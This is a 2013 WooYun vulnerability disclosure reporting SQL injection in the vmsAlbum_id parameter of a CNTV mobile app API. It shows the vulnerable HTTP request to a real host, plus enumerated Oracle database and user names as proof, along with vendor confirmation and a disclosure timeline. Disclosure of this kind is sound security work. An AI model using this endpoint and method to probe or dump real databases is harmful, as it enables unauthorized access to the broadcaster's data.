当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046137

漏洞标题:APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库

相关厂商:中国网络电视台

漏洞作者: zzR

提交时间:2013-12-16 17:36

修复时间:2014-01-30 17:37

公开时间:2014-01-30 17:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-16: 细节已通知厂商并且等待厂商处理中
2013-12-16: 厂商已经确认,细节仅向厂商公开
2013-12-26: 细节向核心白帽子及相关领域专家公开
2014-01-05: 细节向普通白帽子公开
2014-01-15: 细节向实习白帽子公开
2014-01-30: 细节向公众公开

简要描述:

每天晚上准时收看新闻联播,接受教育,积极进步。在19:29:45的时候,主持人会说:获取更多资讯,敬请关注央视微博、微信、新闻客户端……
其实这个漏洞系列title不重要,重要是在这些产品中产生的各种各样类型的问题。
这是从一个比较边缘的产品出发,最后还是会涉及到核心产品。

详细说明:

从央视的几款主要产品出发,主要涉及央视新闻 、CNTV、CNTV Cbox直播大全、5+VIP等都会有相同的app请求。
从一个不起眼的app出发IPandaCam,注入到核心产品数据

GET /iphoneInterface/cntv/getVideoListBySort.json?vmsAlbum_id=VSET100167308821&page=1&pageSize=20 HTTP/1.1
Host: hot.app.cntv.cn
Proxy-Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: zh-cn
Connection: keep-alive
Pragma: no-cache
User-Agent: LovePanda/1.0.1 CFNetwork/672.0.8 Darwin/14.0.0


vmsAlbum_id存在注入

漏洞证明:

current db&user

1.png


dbs

[*] APEX_030200
[*] CMSUSER
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] VMSUSER
[*] XDB


其中cmuser 174张表

174cmsusers.png


users

database management system users [36]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CMSSEL
[*] CMSUSER
[*] CNTVSEARCH
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] GOLDENGATE
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] VMSSEL
[*] VMSUSER
[*] WMSYS
[*] XDB
[*] XS$NULL
[*] YXG


未继续深入

修复方案:

来乌云把爱带回家

版权声明:转载请注明来源 zzR@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-16 17:46

厂商回复:

非常感谢,我们将及时修复漏洞!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-12-16 18:21 | 大胖子 ( 普通白帽子 | Rank:122 漏洞数:12 )

    悄悄关注之

  2. 2013-12-16 18:30 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    @大胖子 @小胖子 亲皂友?

  3. 2013-12-16 18:48 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    @大胖子 尼玛打击伪劣产品人人有责!!!

  4. 2013-12-16 18:49 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

    @小胖子 @zzR @大胖子 搞笑